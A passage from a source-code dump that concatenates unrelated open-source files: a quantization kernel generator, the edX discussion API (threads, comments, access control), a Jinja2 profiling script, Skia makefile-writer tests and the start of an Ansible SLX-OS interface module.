emitter.EmitVSub('f32', register, register, self.output_range_min)
for register in load_input:
emitter.EmitVMul('f32', register, register,
self.one_over_output_range_scale)
for register in load_input:
emitter.EmitVAdd('f32', register, register, self.output_range_offset)
for register in load_input:
emitter.EmitVCvt('s32', 'f32', register, register)
emitter.EmitNewline()
emitter.EmitVStoreAE(32, elements, load_input, output_address, None)
emitter.EmitPld(output_address)
registers.FreeRegisters(load_input + load_bias)
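# A minimal scalar sketch (reference only, not used by the generator) of the
# BiasAdd arithmetic emitted above: dequantize the input and bias values, add
# them, then requantize the sum into the int32_t output range.
def _bias_add_scalar_reference(input_u8, bias_u8, params):
  """Reference for one element of the uint8_t + uint8_t -> int32_t bias add."""
  input_value = float(input_u8) * params['input_range_scale'] + params['input_range_min']
  bias_value = float(bias_u8) * params['bias_range_scale'] + params['bias_range_min']
  total = input_value + bias_value - params['output_range_min']
  return int(total * params['one_over_output_range_scale'] +
             params['output_range_offset'])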
def GenerateKernels(cc_emitter, asm_emitter, shapes):
"""Generate the quantization/dequantization/requantization kernels."""
requantize = Requantize(cc_emitter, asm_emitter)
quantize = Quantize(cc_emitter, asm_emitter)
dequantize = Dequantize(cc_emitter, asm_emitter)
minmax = MinMax('uint8_t', cc_emitter, asm_emitter)
biasadd = BiasAdd('uint8_t', cc_emitter, asm_emitter)
for shape in shapes:
requantize.SpecializeTransform1DKernel('int32_t', 'uint8_t', shape[0],
shape[1])
for shape in shapes:
quantize.SpecializeTransform1DKernel('float', 'uint8_t', shape[0], shape[1])
for shape in shapes:
dequantize.SpecializeTransform1DKernel('uint8_t', 'float', shape[0],
shape[1])
for shape in shapes:
minmax.SpecializeTransform1DKernel('uint8_t', 'uint8_t', shape[0], shape[1])
for shape in shapes:
biasadd.SpecializeTransform1DKernel('uint8_t', 'int32_t', shape[0],
shape[1])
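# Hedged usage note: the shapes passed to GenerateKernels are assumed to be
# (kernel_size, leftovers) pairs; the Check() methods above require
# kernel_size == 16 and leftovers < 16, so a plausible call (the emitter
# objects come from the surrounding generator framework) would be:
#   GenerateKernels(cc_emitter, asm_emitter,
#                   [(16, leftovers) for leftovers in range(16)])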
|
doismellburning/edx-platform
|
refs/heads/master
|
lms/djangoapps/discussion_api/api.py
|
5
|
"""
Discussion API internal interface
"""
from collections import defaultdict
from urllib import urlencode
from urlparse import urlunparse
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from django.http import Http404
from rest_framework.exceptions import PermissionDenied
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locator import CourseKey
from courseware.courses import get_course_with_access
from discussion_api.forms import CommentActionsForm, ThreadActionsForm
from discussion_api.pagination import get_paginated_data
from discussion_api.permissions import (
can_delete,
get_editable_fields,
get_initializable_comment_fields,
get_initializable_thread_fields,
)
from discussion_api.serializers import CommentSerializer, ThreadSerializer, get_context
from django_comment_client.base.views import (
THREAD_CREATED_EVENT_NAME,
get_comment_created_event_data,
get_comment_created_event_name,
get_thread_created_event_data,
track_forum_event,
)
from django_comment_common.signals import (
thread_created,
thread_edited,
thread_deleted,
thread_voted,
comment_created,
comment_edited,
comment_voted,
comment_deleted,
)
from django_comment_client.utils import get_accessible_discussion_modules, is_commentable_cohorted
from lms.lib.comment_client.comment import Comment
from lms.lib.comment_client.thread import Thread
from lms.lib.comment_client.utils import CommentClientRequestError
from openedx.core.djangoapps.course_groups.cohorts import get_cohort_id
def _get_course_or_404(course_key, user):
"""
Get the course descriptor, raising Http404 if the course is not found,
the user cannot access forums for the course, or the discussion tab is
disabled for the course.
"""
course = get_course_with_access(user, 'load', course_key, check_if_enrolled=True)
if not any([tab.type == 'discussion' for tab in course.tabs]):
raise Http404
return course
def _get_thread_and_context(request, thread_id, retrieve_kwargs=None):
"""
Retrieve the given thread and build a serializer context for it, returning
both. This function also enforces access control for the thread (checking
both the user's access to the course and to the thread's cohort if
applicable). Raises Http404 if the thread does not exist or the user cannot
access it.
"""
retrieve_kwargs = retrieve_kwargs or {}
try:
if "mark_as_read" not in retrieve_kwargs:
retrieve_kwargs["mark_as_read"] = False
cc_thread = Thread(id=thread_id).retrieve(**retrieve_kwargs)
course_key = CourseKey.from_string(cc_thread["course_id"])
course = _get_course_or_404(course_key, request.user)
context = get_context(course, request, cc_thread)
if (
not context["is_requester_privileged"] and
cc_thread["group_id"] and
is_commentable_cohorted(course.id, cc_thread["commentable_id"])
):
requester_cohort = get_cohort_id(request.user, course.id)
if requester_cohort is not None and cc_thread["group_id"] != requester_cohort:
raise Http404
return cc_thread, context
except CommentClientRequestError:
# params are validated at a higher level, so the only possible request
# error is if the thread doesn't exist
raise Http404
def _get_comment_and_context(request, comment_id):
"""
Retrieve the given comment and build a serializer context for it, returning
both. This function also enforces access control for the comment (checking
both the user's access to the course and to the comment's thread's cohort if
applicable). Raises Http404 if the comment does not exist or the user cannot
access it.
"""
try:
cc_comment = Comment(id=comment_id).retrieve()
_, context = _get_thread_and_context(request, cc_comment["thread_id"])
return cc_comment, context
except CommentClientRequestError:
raise Http404
def _is_user_author_or_privileged(cc_content, context):
"""
Check if the user is the author of a content object or a privileged user.
Returns:
Boolean
"""
return (
context["is_requester_privileged"] or
context["cc_requester"]["id"] == cc_content["user_id"]
)
def get_thread_list_url(request, course_key, topic_id_list=None, following=False):
"""
Returns the URL for the thread_list_url field, given a list of topic_ids
"""
path = reverse("thread-list")
query_list = (
[("course_id", unicode(course_key))] +
[("topic_id", topic_id) for topic_id in topic_id_list or []] +
([("following", following)] if following else [])
)
return request.build_absolute_uri(urlunparse(("", "", path, "", urlencode(query_list), "")))
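# A minimal sketch of the query-string assembly above, runnable outside Django
# (the "/threads/" path is only a stand-in for whatever reverse() returns):
#   >>> urlunparse(("", "", "/threads/", "",
#   ...             urlencode([("course_id", "x"), ("topic_id", "t1")]), ""))
#   '/threads/?course_id=x&topic_id=t1'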
def get_course(request, course_key):
"""
Return general discussion information for the course.
Parameters:
request: The django request object used for build_absolute_uri and
determining the requesting user.
course_key: The key of the course to get information for
Returns:
The course information; see discussion_api.views.CourseView for more
detail.
Raises:
Http404: if the course does not exist or is not accessible to the
requesting user
"""
course = _get_course_or_404(course_key, request.user)
return {
"id": unicode(course_key),
"blackouts": [
{"start": blackout["start"].isoformat(), "end": blackout["end"].isoformat()}
for blackout in course.get_discussion_blackout_datetimes()
],
"thread_list_url": get_thread_list_url(request, course_key),
"following_thread_list_url": get_thread_list_url(request, course_key, following=True),
"topics_url": request.build_absolute_uri(
reverse("course_topics", kwargs={"course_id": course_key})
)
}
def get_course_topics(request, course_key):
"""
Return the course topic listing for the given course and user.
Parameters:
course_key: The key of the course to get topics for
        request: The django request object; the requesting user is used for access control
Returns:
A course topic listing dictionary; see discussion_api.views.CourseTopicViews
for more detail.
"""
def get_module_sort_key(module):
"""
Get the sort key for the module (falling back to the discussion_target
setting if absent)
"""
return module.sort_key or module.discussion_target
course = _get_course_or_404(course_key, request.user)
discussion_modules = get_accessible_discussion_modules(course, request.user)
modules_by_category = defaultdict(list)
for module in discussion_modules:
modules_by_category[module.discussion_category].append(module)
def get_sorted_modules(category):
"""Returns key sorted modules by category"""
return sorted(modules_by_category[category], key=get_module_sort_key)
courseware_topics = [
{
"id": None,
"name": category,
"thread_list_url": get_thread_list_url(
request,
course_key,
[item.discussion_id for item in get_sorted_modules(category)]
),
"children": [
{
"id": module.discussion_id,
"name": module.discussion_target,
"thread_list_url": get_thread_list_url(request, course_key, [module.discussion_id]),
"children": [],
}
for module in get_sorted_modules(category)
],
}
for category in sorted(modules_by_category.keys())
]
non_courseware_topics = [
{
"id": entry["id"],
"name": name,
"thread_list_url": get_thread_list_url(request, course_key, [entry["id"]]),
"children": [],
}
for name, entry in sorted(
course.discussion_topics.items(),
key=lambda item: item[1].get("sort_key", item[0])
)
]
return {
"courseware_topics": courseware_topics,
"non_courseware_topics": non_courseware_topics,
}
def get_thread_list(
request,
course_key,
page,
page_size,
topic_id_list=None,
text_search=None,
following=False,
view=None,
order_by="last_activity_at",
order_direction="desc",
):
"""
Return the list of all discussion threads pertaining to the given course
Parameters:
        request: The django request object used for build_absolute_uri
course_key: The key of the course to get discussion threads for
page: The page number (1-indexed) to retrieve
page_size: The number of threads to retrieve per page
topic_id_list: The list of topic_ids to get the discussion threads for
        text_search: A text search query string to match
following: If true, retrieve only threads the requester is following
view: filters for either "unread" or "unanswered" threads
        order_by: The key by which to sort the threads. The only accepted
            values are "last_activity_at", "comment_count", and "vote_count".
            The default is "last_activity_at".
        order_direction: The direction in which to sort the threads. The only
            accepted values are "asc" and "desc". The default is "desc".
Note that topic_id_list, text_search, and following are mutually exclusive.
Returns:
A paginated result containing a list of threads; see
discussion_api.views.ThreadViewSet for more detail.
Raises:
ValidationError: if an invalid value is passed for a field.
ValueError: if more than one of the mutually exclusive parameters is
provided
Http404: if the requesting user does not have access to the requested course
or a page beyond the last is requested
"""
exclusive_param_count = sum(1 for param in [topic_id_list, text_search, following] if param)
if exclusive_param_count > 1: # pragma: no cover
raise ValueError("More than one mutually exclusive param passed to get_thread_list")
cc_map = {"last_activity_at": "date", "comment_count": "comments", "vote_count": "votes"}
if order_by not in cc_map:
raise ValidationError({
"order_by":
["Invalid value. '{}' must be 'last_activity_at', 'comment_count', or 'vote_count'".format(order_by)]
})
if order_direction not in ["asc", "desc"]:
raise ValidationError({
"order_direction": ["Invalid value. '{}' must be 'asc' or 'desc'".format(order_direction)]
})
course = _get_course_or_404(course_key, request.user)
context = get_context(course, request)
query_params = {
"user_id": unicode(request.user.id),
"group_id": (
None if context["is_requester_privileged"] else
get_cohort_id(request.user, course.id)
),
"page": page,
"per_page": page_size,
"text": text_search,
"sort_key": cc_map.get(order_by),
"sort_order": order_direction,
}
text_search_rewrite = None
if view:
if view in ["unread", "unanswered"]:
query_params[view] = "true"
else:
            raise ValidationError({
"view": ["Invalid value. '{}' must be 'unread' or 'unanswered'".format(view)]
})
if following:
threads, result_page, num_pages = context["cc_requester"].subscribed_threads(query_params)
else:
query_params["course_id"] = unicode(course.id)
query_params["commentable_ids"] = ",".join(topic_id_list) if topic_id_list else None
query_params["text"] = text_search
threads, result_page, num_pages, text_search_rewrite = Thread.search(query_params)
# The comments service returns the last page of results if the requested
    # page is beyond the last page, but we want to be consistent with DRF's general
# behavior and return a 404 in that case
if result_page != page:
raise Http404
results = [ThreadSerializer(thread, remove_fields=['response_count'], context=context).data for thread in threads]
ret = get_paginated_data(request, results, page, num_pages)
ret["text_search_rewrite"] = text_search_rewrite
return ret
def get_comment_list(request, thread_id, endorsed, page, page_size, mark_as_read=False):
"""
Return the list of comments in the given thread.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
thread_id: The id of the thread to get comments for.
endorsed: Boolean indicating whether to get endorsed or non-endorsed
comments (or None for all comments). Must be None for a discussion
thread and non-None for a question thread.
page: The page number (1-indexed) to retrieve
page_size: The number of comments to retrieve per page
mark_as_read: Marks the thread of the comment list as read.
Returns:
A paginated result containing a list of comments; see
discussion_api.views.CommentViewSet for more detail.
"""
response_skip = page_size * (page - 1)
cc_thread, context = _get_thread_and_context(
request,
thread_id,
retrieve_kwargs={
"recursive": True,
"user_id": request.user.id,
"mark_as_read": mark_as_read,
"response_skip": response_skip,
"response_limit": page_size,
}
)
# Responses to discussion threads cannot be separated by endorsed, but
# responses to question threads must be separated by endorsed due to the
# existing comments service interface
if cc_thread["thread_type"] == "question":
if endorsed is None:
raise ValidationError({"endorsed": ["This field is required for question threads."]})
elif endorsed:
# CS does not apply resp_skip and resp_limit to endorsed responses
# of a question post
responses = cc_thread["endorsed_responses"][response_skip:(response_skip + page_size)]
resp_total = len(cc_thread["endorsed_responses"])
else:
responses = cc_thread["non_endorsed_responses"]
resp_total = cc_thread["non_endorsed_resp_total"]
else:
if endorsed is not None:
raise ValidationError(
{"endorsed": ["This field may not be specified for discussion threads."]}
)
responses = cc_thread["children"]
resp_total = cc_thread["resp_total"]
# The comments service returns the last page of results if the requested
    # page is beyond the last page, but we want to be consistent with DRF's general
# behavior and return a 404 in that case
if not responses and page != 1:
raise Http404
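    # Ceiling division, e.g. 25 responses with page_size 10 yields 3 pages.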
num_pages = (resp_total + page_size - 1) / page_size if resp_total else 1
results = [CommentSerializer(response, context=context).data for response in responses]
return get_paginated_data(request, results, page, num_pages)
def _check_fields(allowed_fields, data, message):
"""
    Checks that the keys given in data are in allowed_fields
Arguments:
allowed_fields (set): A set of allowed fields
data (dict): The data to compare the allowed_fields against
message (str): The message to return if there are any invalid fields
Raises:
ValidationError if the given data contains a key that is not in
allowed_fields
"""
non_allowed_fields = {field: [message] for field in data.keys() if field not in allowed_fields}
if non_allowed_fields:
raise ValidationError(non_allowed_fields)
def _check_initializable_thread_fields(data, context): # pylint: disable=invalid-name
"""
Checks if the given data contains a thread field that is not initializable
by the requesting user
Arguments:
data (dict): The data to compare the allowed_fields against
context (dict): The context appropriate for use with the thread which
includes the requesting user
Raises:
ValidationError if the given data contains a thread field that is not
initializable by the requesting user
"""
_check_fields(
get_initializable_thread_fields(context),
data,
"This field is not initializable."
)
def _check_initializable_comment_fields(data, context): # pylint: disable=invalid-name
"""
Checks if the given data contains a comment field that is not initializable
by the requesting user
Arguments:
data (dict): The data to compare the allowed_fields against
context (dict): The context appropriate for use with the comment which
includes the requesting user
Raises:
ValidationError if the given data contains a comment field that is not
initializable by the requesting user
"""
_check_fields(
get_initializable_comment_fields(context),
data,
"This field is not initializable."
)
def _check_editable_fields(cc_content, data, context):
"""
Raise ValidationError if the given update data contains a field that is not
editable by the requesting user
"""
_check_fields(
get_editable_fields(cc_content, context),
data,
"This field is not editable."
)
def _do_extra_actions(api_content, cc_content, request_fields, actions_form, context):
"""
Perform any necessary additional actions related to content creation or
update that require a separate comments service request.
"""
for field, form_value in actions_form.cleaned_data.items():
if field in request_fields and form_value != api_content[field]:
api_content[field] = form_value
if field == "following":
if form_value:
context["cc_requester"].follow(cc_content)
else:
context["cc_requester"].unfollow(cc_content)
elif field == "abuse_flagged":
if form_value:
cc_content.flagAbuse(context["cc_requester"], cc_content)
else:
cc_content.unFlagAbuse(context["cc_requester"], cc_content, removeAll=False)
else:
assert field == "voted"
signal = thread_voted if cc_content.type == 'thread' else comment_voted
signal.send(sender=None, user=context["request"].user, post=cc_content)
if form_value:
context["cc_requester"].vote(cc_content, "up")
api_content["vote_count"] += 1
else:
context["cc_requester"].unvote(cc_content)
api_content["vote_count"] -= 1
def create_thread(request, thread_data):
"""
Create a thread.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
thread_data: The data for the created thread.
Returns:
The created thread; see discussion_api.views.ThreadViewSet for more
detail.
"""
course_id = thread_data.get("course_id")
user = request.user
if not course_id:
raise ValidationError({"course_id": ["This field is required."]})
try:
course_key = CourseKey.from_string(course_id)
course = _get_course_or_404(course_key, user)
except (Http404, InvalidKeyError):
raise ValidationError({"course_id": ["Invalid value."]})
context = get_context(course, request)
_check_initializable_thread_fields(thread_data, context)
if (
"group_id" not in thread_data and
is_commentable_cohorted(course_key, thread_data.get("topic_id"))
):
thread_data = thread_data.copy()
thread_data["group_id"] = get_cohort_id(user, course_key)
serializer = ThreadSerializer(data=thread_data, remove_fields=['response_count'], context=context)
actions_form = ThreadActionsForm(thread_data)
if not (serializer.is_valid() and actions_form.is_valid()):
raise ValidationError(dict(serializer.errors.items() + actions_form.errors.items()))
serializer.save()
cc_thread = serializer.instance
thread_created.send(sender=None, user=user, post=cc_thread)
api_thread = serializer.data
_do_extra_actions(api_thread, cc_thread, thread_data.keys(), actions_form, context)
track_forum_event(
request,
THREAD_CREATED_EVENT_NAME,
course,
cc_thread,
get_thread_created_event_data(cc_thread, followed=actions_form.cleaned_data["following"])
)
return api_thread
def create_comment(request, comment_data):
"""
Create a comment.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
comment_data: The data for the created comment.
Returns:
The created comment; see discussion_api.views.CommentViewSet for more
detail.
"""
thread_id = comment_data.get("thread_id")
if not thread_id:
raise ValidationError({"thread_id": ["This field is required."]})
try:
cc_thread, context = _get_thread_and_context(request, thread_id)
except Http404:
raise ValidationError({"thread_id": ["Invalid value."]})
_check_initializable_comment_fields(comment_data, context)
serializer = CommentSerializer(data=comment_data, context=context)
actions_form = CommentActionsForm(comment_data)
if not (serializer.is_valid() and actions_form.is_valid()):
raise ValidationError(dict(serializer.errors.items() + actions_form.errors.items()))
serializer.save()
cc_comment = serializer.instance
comment_created.send(sender=None, user=request.user, post=cc_comment)
api_comment = serializer.data
_do_extra_actions(api_comment, cc_comment, comment_data.keys(), actions_form, context)
track_forum_event(
request,
get_comment_created_event_name(cc_comment),
context["course"],
cc_comment,
get_comment_created_event_data(cc_comment, cc_thread["commentable_id"], followed=False)
)
return api_comment
def update_thread(request, thread_id, update_data):
"""
Update a thread.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
thread_id: The id for the thread to update.
update_data: The data to update in the thread.
Returns:
The updated thread; see discussion_api.views.ThreadViewSet for more
detail.
"""
cc_thread, context = _get_thread_and_context(request, thread_id)
_check_editable_fields(cc_thread, update_data, context)
serializer = ThreadSerializer(cc_thread, remove_fields=['response_count'], data=update_data, partial=True,
context=context)
actions_form = ThreadActionsForm(update_data)
if not (serializer.is_valid() and actions_form.is_valid()):
raise ValidationError(dict(serializer.errors.items() + actions_form.errors.items()))
# Only save thread object if some of the edited fields are in the thread data, not extra actions
if set(update_data) - set(actions_form.fields):
serializer.save()
# signal to update Teams when a user edits a thread
thread_edited.send(sender=None, user=request.user, post=cc_thread)
api_thread = serializer.data
_do_extra_actions(api_thread, cc_thread, update_data.keys(), actions_form, context)
return api_thread
def update_comment(request, comment_id, update_data):
"""
Update a comment.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
comment_id: The id for the comment to update.
update_data: The data to update in the comment.
Returns:
The updated comment; see discussion_api.views.CommentViewSet for more
detail.
Raises:
Http404: if the comment does not exist or is not accessible to the
requesting user
PermissionDenied: if the comment is accessible to but not editable by
the requesting user
ValidationError: if there is an error applying the update (e.g. raw_body
is empty or thread_id is included)
"""
cc_comment, context = _get_comment_and_context(request, comment_id)
_check_editable_fields(cc_comment, update_data, context)
serializer = CommentSerializer(cc_comment, data=update_data, partial=True, context=context)
actions_form = CommentActionsForm(update_data)
if not (serializer.is_valid() and actions_form.is_valid()):
raise ValidationError(dict(serializer.errors.items() + actions_form.errors.items()))
# Only save comment object if some of the edited fields are in the comment data, not extra actions
if set(update_data) - set(actions_form.fields):
serializer.save()
comment_edited.send(sender=None, user=request.user, post=cc_comment)
api_comment = serializer.data
_do_extra_actions(api_comment, cc_comment, update_data.keys(), actions_form, context)
return api_comment
def get_thread(request, thread_id):
"""
Retrieve a thread.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
thread_id: The id for the thread to retrieve
"""
cc_thread, context = _get_thread_and_context(request, thread_id)
serializer = ThreadSerializer(cc_thread, context=context)
return serializer.data
def delete_thread(request, thread_id):
"""
Delete a thread.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
thread_id: The id for the thread to delete
Raises:
PermissionDenied: if user does not have permission to delete thread
"""
cc_thread, context = _get_thread_and_context(request, thread_id)
if can_delete(cc_thread, context):
cc_thread.delete()
thread_deleted.send(sender=None, user=request.user, post=cc_thread)
else:
raise PermissionDenied
def delete_comment(request, comment_id):
"""
Delete a comment.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
comment_id: The id of the comment to delete
Raises:
PermissionDenied: if user does not have permission to delete thread
"""
cc_comment, context = _get_comment_and_context(request, comment_id)
if can_delete(cc_comment, context):
cc_comment.delete()
comment_deleted.send(sender=None, user=request.user, post=cc_comment)
else:
raise PermissionDenied
|
brstew/MBED-BUILD
|
refs/heads/master
|
Jinja2-2.8/examples/profile.py
|
75
|
try:
from cProfile import Profile
except ImportError:
from profile import Profile
from pstats import Stats
from jinja2 import Environment as JinjaEnvironment
context = {
'page_title': 'mitsuhiko\'s benchmark',
'table': [dict(a=1,b=2,c=3,d=4,e=5,f=6,g=7,h=8,i=9,j=10) for x in range(1000)]
}
source = """\
% macro testmacro(x)
<span>${x}</span>
% endmacro
<!doctype html>
<html>
<head>
<title>${page_title|e}</title>
</head>
<body>
<div class="header">
<h1>${page_title|e}</h1>
</div>
<div class="table">
<table>
% for row in table
<tr>
% for cell in row
<td>${testmacro(cell)}</td>
% endfor
</tr>
% endfor
</table>
</div>
</body>
</html>\
"""
jinja_template = JinjaEnvironment(
line_statement_prefix='%',
variable_start_string="${",
variable_end_string="}"
).from_string(source)
print jinja_template.environment.compile(source, raw=True)
p = Profile()
p.runcall(lambda: jinja_template.render(context))
stats = Stats(p)
stats.sort_stats('time', 'calls')
stats.print_stats()
|
xin3liang/platform_external_chromium_org_third_party_skia
|
refs/heads/master
|
platform_tools/android/tests/makefile_writer_tests.py
|
65
|
#!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Test makefile_writer.py
"""
import argparse
import os
import shutil
import sys
import tempfile
import test_variables
import unittest
import utils
sys.path.append(test_variables.GYP_GEN_DIR)
import makefile_writer
import tool_makefile_writer
import vars_dict_lib
MAKEFILE_NAME = test_variables.ANDROID_MK
REBASELINE_MSG = ('If you\'ve modified makefile_writer.py, run '
'"makefile_writer_tests.py --rebaseline" to rebaseline')
TOOL_DIR = 'tool'
def generate_dummy_vars_dict(name):
"""Create a VarsDict and fill it with dummy entries.
Args:
name: string to be appended to each entry, if not None.
Returns:
A VarsDict with dummy entries.
"""
vars_dict = vars_dict_lib.VarsDict()
for key in vars_dict.keys():
entry = key.lower()
if name:
entry += '_' + name
vars_dict[key].add(entry)
return vars_dict
def generate_write_local_vars_params():
"""Generator to compute params for write_local_vars tests.
Each iteration yields a new tuple: (filename, append, name), specific to a
way to call write_local_vars for the tests.
Yields:
filename: filename corresponding to the expectation file for this
combination of params to write_local_vars.
append: boolean to pass as append parameter to write_local_vars.
name: string to pass as name parameter to write_local_vars.
"""
for append in [ True, False ]:
for name in [ None, 'arm', 'foo' ]:
filename = 'write_local_vars'
if append:
filename += '_append'
else:
filename += '_no_append'
if name:
filename += '_' + name
else:
filename += '_no_name'
yield (filename, append, name)
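# For illustration (derived from the loops above), the first tuples yielded are:
#   ('write_local_vars_append_no_name', True, None)
#   ('write_local_vars_append_arm', True, 'arm')
#   ('write_local_vars_append_foo', True, 'foo')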
def generate_dummy_vars_dict_data(name, condition):
"""Create a dummy VarsDictData.
Create a dummy VarsDictData, using the name for both the contained
VarsDict and the VarsDictData
Args:
name: name used by both the returned VarsDictData and its contained
VarsDict.
condition: condition used by the returned VarsDictData.
Returns:
A VarsDictData with dummy values, using the passed in info.
"""
vars_dict = generate_dummy_vars_dict(name)
return makefile_writer.VarsDictData(vars_dict=vars_dict, name=name,
condition=condition)
def generate_dummy_makefile(target_dir):
"""Create a dummy makefile to demonstrate how it works.
Use dummy values unrelated to any gyp files. Its output should remain the
same unless/until makefile_writer.write_android_mk changes.
Args:
target_dir: directory in which to write the resulting Android.mk
"""
common_vars_dict = generate_dummy_vars_dict(None)
deviation_params = [('foo', 'COND'), ('bar', None)]
deviations = [generate_dummy_vars_dict_data(name, condition)
for (name, condition) in deviation_params]
makefile_writer.write_android_mk(target_dir=target_dir,
common=common_vars_dict,
deviations_from_common=deviations)
def generate_dummy_tool_makefile(target_dir):
"""Create a dummy makefile for a tool.
Args:
target_dir: directory in which to write the resulting Android.mk
"""
vars_dict = generate_dummy_vars_dict(None)
tool_makefile_writer.write_tool_android_mk(target_dir=target_dir,
var_dict=vars_dict)
class MakefileWriterTest(unittest.TestCase):
def test_write_group_empty(self):
f = tempfile.TemporaryFile()
assert f.tell() == 0
for empty in (None, []):
for truth in (True, False):
makefile_writer.write_group(f, 'name', empty, truth)
self.assertEqual(f.tell(), 0)
f.close()
def test_write_group(self):
animals = ('dog', 'cat', 'mouse', 'elephant')
fd, filename = tempfile.mkstemp()
with open(filename, 'w') as f:
makefile_writer.write_group(f, 'animals', animals, False)
os.close(fd)
# Now confirm that it matches expectations
utils.compare_to_expectation(filename, 'animals.txt', self.assertTrue)
with open(filename, 'w') as f:
makefile_writer.write_group(f, 'animals_append', animals, True)
# Now confirm that it matches expectations
utils.compare_to_expectation(filename, 'animals_append.txt',
self.assertTrue)
os.remove(filename)
def test_write_local_vars(self):
vars_dict = generate_dummy_vars_dict(None)
# Compare various ways of calling write_local_vars to expectations.
for (filename, append, name) in generate_write_local_vars_params():
fd, outfile = tempfile.mkstemp()
with open(outfile, 'w') as f:
makefile_writer.write_local_vars(f, vars_dict, append, name)
os.close(fd)
# Compare to the expected file.
utils.compare_to_expectation(outfile, filename, self.assertTrue,
REBASELINE_MSG)
# KNOWN_TARGETS is always a key in the input VarsDict, but it should not
# be written to the resulting file.
# Note that this assumes none of our dummy entries is 'KNOWN_TARGETS'.
known_targets_name = 'KNOWN_TARGETS'
self.assertEqual(len(vars_dict[known_targets_name]), 1)
with open(outfile, 'r') as f:
self.assertNotIn(known_targets_name, f.read())
os.remove(outfile)
def test_write_android_mk(self):
outdir = tempfile.mkdtemp()
generate_dummy_makefile(outdir)
utils.compare_to_expectation(os.path.join(outdir, MAKEFILE_NAME),
MAKEFILE_NAME, self.assertTrue, REBASELINE_MSG)
shutil.rmtree(outdir)
def test_tool_writer(self):
outdir = tempfile.mkdtemp()
tool_dir = os.path.join(outdir, TOOL_DIR)
os.mkdir(tool_dir)
generate_dummy_tool_makefile(tool_dir)
utils.compare_to_expectation(os.path.join(tool_dir, MAKEFILE_NAME),
os.path.join(TOOL_DIR, MAKEFILE_NAME),
self.assertTrue, REBASELINE_MSG)
def main():
loader = unittest.TestLoader()
suite = loader.loadTestsFromTestCase(MakefileWriterTest)
results = unittest.TextTestRunner(verbosity=2).run(suite)
print repr(results)
if not results.wasSuccessful():
raise Exception('failed one or more unittests')
def rebaseline():
generate_dummy_makefile(utils.EXPECTATIONS_DIR)
vars_dict = generate_dummy_vars_dict(None)
for (filename, append, name) in generate_write_local_vars_params():
with open(os.path.join(utils.EXPECTATIONS_DIR, filename), 'w') as f:
makefile_writer.write_local_vars(f, vars_dict, append, name)
generate_dummy_tool_makefile(os.path.join(utils.EXPECTATIONS_DIR, TOOL_DIR))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-r', '--rebaseline', help='Rebaseline expectations.',
action='store_true')
args = parser.parse_args()
if args.rebaseline:
rebaseline()
else:
main()
|
pgmillon/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/slxos/slxos_interface.py
|
91
|
#!/usr/bin/python
#
# (c) 2018 Extreme Networks Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: slxos_interface
version_added: "2.6"
author: "Lindsay Hill (@LindsayHill)"
short_description: Manage Interfaces on Extreme SLX-OS network devices
description:
- This module provides declarative management of Interfaces
on Extreme SLX-OS network devices.
notes:
- Tested against SLX-OS 17s.1.02
options:
name:
description:
- Name of the Interface.
required: true
description:
description:
- Description of Interface.
enabled:
description:
- Interface link status.
default: True
type: bool
speed:
description:
- Interface link speed.
mtu:
description:
- Maximum size of transmit packet.
tx_rate:
description:
- Transmit rate in bits per second (bps).
rx_rate:
description:
- Receiver rate in bits per second (bps).
neighbors:
description:
- Check the operational state of given interface C(name) for LLDP neighbor.
- The following suboptions are available.
suboptions:
host:
description:
- "LLDP neighbor host for given interface C(name)."
port:
description:
- "LLDP neighbor port to which given interface C(name) is connected."
aggregate:
description: List of Interfaces definitions.
delay:
description:
- Time in seconds to wait before checking for the operational state on remote
        device. This wait is applicable for operational state arguments, which are
        I(state) with values C(up)/C(down), I(tx_rate) and I(rx_rate).
default: 10
state:
description:
- State of the Interface configuration, C(up) means present and
operationally up and C(down) means present and operationally C(down)
default: present
choices: ['present', 'absent', 'up', 'down']
"""
EXAMPLES = """
- name: configure interface
slxos_interface:
name: Ethernet 0/2
description: test-interface
speed: 1000
mtu: 9216
- name: remove interface
slxos_interface:
name: Loopback 9
state: absent
- name: make interface up
slxos_interface:
name: Ethernet 0/2
enabled: True
- name: make interface down
slxos_interface:
name: Ethernet 0/2
enabled: False
- name: Check intent arguments
slxos_interface:
name: Ethernet 0/2
state: up
tx_rate: ge(0)
rx_rate: le(0)
- name: Check neighbors intent arguments
slxos_interface:
name: Ethernet 0/41
neighbors:
- port: Ethernet 0/41
host: SLX
- name: Config + intent
slxos_interface:
name: Ethernet 0/2
enabled: False
state: down
- name: Add interface using aggregate
slxos_interface:
aggregate:
- { name: Ethernet 0/1, mtu: 1548, description: test-interface-1 }
- { name: Ethernet 0/2, mtu: 1548, description: test-interface-2 }
speed: 10000
state: present
- name: Delete interface using aggregate
slxos_interface:
aggregate:
- name: Loopback 9
- name: Loopback 10
state: absent
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device.
returned: always, except for the platforms that use Netconf transport to manage the device.
type: list
sample:
- interface Ethernet 0/2
- description test-interface
- mtu 1548
"""
import re
from copy import deepcopy
from time import sleep
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import AnsibleModule
